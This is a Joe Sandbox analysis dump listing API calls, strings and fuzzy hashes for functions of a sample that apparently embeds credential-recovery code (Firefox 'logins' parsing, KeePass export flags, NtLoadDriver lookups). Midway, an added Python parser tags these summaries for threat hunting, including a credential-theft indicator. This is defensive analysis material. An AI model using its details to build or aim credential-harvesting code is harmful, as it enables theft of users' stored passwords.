                                                                                                                                                • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                                                  • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                                                  • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                                                • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                                                • API String ID: 4054529287-3175352466
                                                                                                                                                • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                                                • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                • API String ID: 3143752011-1996832678
                                                                                                                                                • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                                • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                                                                                • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                                • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                                                • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                • API String ID: 667068680-2887671607
                                                                                                                                                • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                                                                • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                • API String ID: 1607361635-601624466
                                                                                                                                                • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                                                                • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                • API String ID: 2000436516-3842416460
                                                                                                                                                • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                                                • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                                                  • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                  • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                  • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                                                • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                                                • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                                                • LoadIconW.USER32(00000000,00000073), ref: 004035F8
• GetModuleHandleW.KERNEL32(00000000), ref: 00403607
• LoadIconW.USER32(00000000,00000075), ref: 0040360C
• GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
• LoadIconW.USER32(00000000,0000006F), ref: 00403620
• GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
• LoadIconW.USER32(00000000,00000076), ref: 00403634
• GetModuleHandleW.KERNEL32(00000000), ref: 00403643
• LoadIconW.USER32(00000000,00000077), ref: 00403648
• GetModuleHandleW.KERNEL32(00000000), ref: 00403657
• LoadIconW.USER32(00000000,00000070), ref: 0040365C
• GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
• LoadIconW.USER32(00000000,00000078), ref: 00403670
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
• String ID:
• API String ID: 1043902810-0
• Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
• Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
• Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
• Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
APIs
• ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
• _snwprintf.MSVCRT ref: 0044488A
• wcscpy.MSVCRT ref: 004448B4
• ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: ??2@??3@_snwprintfwcscpy
• String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
• API String ID: 2899246560-1542517562
• Opcode ID: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
• Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
• Opcode Fuzzy Hash: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
• Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
APIs
• memset.MSVCRT ref: 0040DBCD
• memset.MSVCRT ref: 0040DBE9
  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
  • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
  • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
  • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
• wcscpy.MSVCRT ref: 0040DC2D
• wcscpy.MSVCRT ref: 0040DC3C
• wcscpy.MSVCRT ref: 0040DC4C
• EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
• EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
• wcscpy.MSVCRT ref: 0040DCC3
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
• String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
• API String ID: 3330709923-517860148
• Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
• Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
• Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
• Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
APIs
  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
  • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
• memset.MSVCRT ref: 0040806A
• memset.MSVCRT ref: 0040807F
• _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
• _wcsicmp.MSVCRT ref: 004081C3
• memset.MSVCRT ref: 004081E4
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
  • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
  • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
  • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
  • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
  • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
  • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
  • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
  • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
  • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
  • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
• String ID: logins$null
• API String ID: 2148543256-2163367763
• Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
• Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
• Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
• Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
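The two function summaries above are the ones worth pulling out of this dump for hunting: the version-info reader (strings `%4.4X%4.4X`, `\VarFileInfo\Translation`, `CompanyName`, ...) and the function that walks a file with UTF-8 (`0000FDE9`) conversions against the strings `logins` and `null`, which is the pattern of the embedded browser-credential recovery code the report flags. The parser below is an added example, not part of the Joe Sandbox report or its tooling: it reads blocks in the APIs / Strings / Memory Dump Source / Similarity layout used on this page, turns each into a record (direct calls, calls seen inside callees, strings, fuzzy hash) and tags the ones a triage analyst would want. The indicator table (`STRING_INDICATORS`, the `CP_UTF8` check, the `file_read` tag) is my own assumption about what to flag; the sample text is a constructed copy of lines from the two blocks above.

```python
"""Parse Joe Sandbox per-function 'APIs' summaries into hunting records.

Added example, not part of the Joe Sandbox report or its tooling. Input is
the block layout used in the report (APIs / Strings / Memory Dump Source /
Similarity). The indicator table is an assumption about what to flag.
"""
import re
from dataclasses import dataclass, field

# Constructed sample: lines copied in the shape the report uses, two blocks.
SAMPLE = """\
APIs
  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?), ref: 0040CC44
  • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
• memset.MSVCRT ref: 0040806A
• _wtoi.MSVCRT(00000000,00000000,00000136,00000000), ref: 004081AF
• _wcsicmp.MSVCRT ref: 004081C3
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000), ref: 00408218
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
• String ID: logins$null
• API String ID: 2148543256-2163367763
• Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
APIs
• ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
• _snwprintf.MSVCRT ref: 0044488A
• wcscpy.MSVCRT ref: 004448B4
Strings
Memory Dump Source
Similarity
• API ID: ??2@??3@_snwprintfwcscpy
• String ID: %4.4X%4.4X$040904E4$CompanyName$OriginalFileName$\\VarFileInfo\\Translation
• API String ID: 2899246560-1542517562
• Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
"""

# One API bullet: optional "Part of subcall function XXXXXXXX:" prefix,
# then Api.MODULE, optional (args), then "ref: ADDRESS".
CALL_RE = re.compile(
    r"^\s*•\s+(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s+)?"
    r"(?P<api>[^\s.(]+)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
META_RE = re.compile(
    r"^\s*•\s+(API ID|String ID|API String ID|Instruction Fuzzy Hash):\s*(.*?)\s*$"
)


@dataclass
class FunctionSummary:
    apis: list = field(default_factory=list)      # direct calls: (api, module, args, ref)
    subcalls: list = field(default_factory=list)  # calls inside callees: (callee, api, module)
    strings: list = field(default_factory=list)
    api_id: str = ""
    api_string_id: str = ""
    fuzzy_hash: str = ""


def parse_blocks(text):
    """Split report text at each 'APIs' heading and parse one summary per block."""
    blocks, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = FunctionSummary()
            blocks.append(cur)
            continue
        if cur is None:
            continue
        m = CALL_RE.match(line)
        if m:
            if m["sub"]:
                cur.subcalls.append((m["sub"], m["api"], m["mod"]))
            else:
                cur.apis.append((m["api"], m["mod"], m["args"] or "", m["ref"]))
            continue
        m = META_RE.match(line)
        if m:
            key, val = m.groups()
            if key == "API ID":
                cur.api_id = val
            elif key == "String ID":
                cur.strings = val.split("$") if val else []  # report joins strings with '$'
            elif key == "API String ID":
                cur.api_string_id = val
            else:
                cur.fuzzy_hash = val
    return blocks


CP_UTF8 = "0000FDE9"  # code page 65001 as the report prints the first argument

# Assumed indicator table (my choice, not from the report): string -> tag.
STRING_INDICATORS = {
    "logins": "browser_credential_store",                 # top-level key of Firefox logins.json
    "\\VarFileInfo\\Translation": "version_info_probe",   # VerQueryValue language-table lookup
}


def triage(fs):
    """Tag a summary using its strings, its call set and the code page it converts with."""
    tags = {STRING_INDICATORS[s] for s in fs.strings if s in STRING_INDICATORS}
    for api, _mod, args, _ref in fs.apis:
        if api in ("WideCharToMultiByte", "MultiByteToWideChar") and args.split(",")[0] == CP_UTF8:
            tags.add("utf8_codepage_conversion")
    names = {a[0] for a in fs.apis} | {s[1] for s in fs.subcalls}
    if {"GetFileSize", "CloseHandle"} <= names:
        tags.add("file_read")
    return tags


def hunting_record(fs):
    """Compact record: lowest direct ref, API names, strings, fuzzy hash, tags."""
    refs = sorted(a[3] for a in fs.apis)
    return {
        "first_ref": refs[0] if refs else None,
        "apis": sorted({a[0] for a in fs.apis}),
        "strings": fs.strings,
        "fuzzy_hash": fs.fuzzy_hash,
        "tags": sorted(triage(fs)),
    }


if __name__ == "__main__":
    for rec in map(hunting_record, parse_blocks(SAMPLE)):
        print(rec)
```

The Instruction Fuzzy Hash carried in each record is the value to pivot on across other reports for the same family; the API String ID pair is stable across builds only when both the call set and the string set survive unchanged, so treat it as a secondary key.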
APIs
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
• ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
• memset.MSVCRT ref: 004085CF
• memset.MSVCRT ref: 004085F1
• memset.MSVCRT ref: 00408606
• strcmp.MSVCRT ref: 00408645
• _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
• _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
• memset.MSVCRT ref: 0040870E
• strcmp.MSVCRT ref: 0040876B
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
• CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
• String ID: ---
• API String ID: 3437578500-2854292027
• Opcode ID: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
• Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
• Opcode Fuzzy Hash: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
• Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
APIs
• memset.MSVCRT ref: 0041087D
• memset.MSVCRT ref: 00410892
• GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
• SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
• SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
• SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
• GetModuleHandleW.KERNEL32(00000000), ref: 00410951
• LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
• GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
• LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
• GetSysColor.USER32(0000000F), ref: 00410999
• DeleteObject.GDI32(?), ref: 004109D0
• DeleteObject.GDI32(?), ref: 004109D6
• SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
• String ID:
• API String ID: 1010922700-0
• Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
• Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
• Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
• Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
APIs
  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
• GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
• malloc.MSVCRT ref: 004186B7
• free.MSVCRT ref: 004186C7
• GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
• free.MSVCRT ref: 004186E0
• GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
• malloc.MSVCRT ref: 004186FE
• GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
• free.MSVCRT ref: 00418716
• free.MSVCRT ref: 0041872A
• free.MSVCRT ref: 00418749
Strings
Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free$FullNamePath$malloc$Version
                                                                                                                                                • String ID: |A
                                                                                                                                                • API String ID: 3356672799-1717621600
                                                                                                                                                • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                                                                • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                                                                • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                                                                • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcsicmp
                                                                                                                                                • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                • API String ID: 2081463915-1959339147
                                                                                                                                                • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                                                                • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
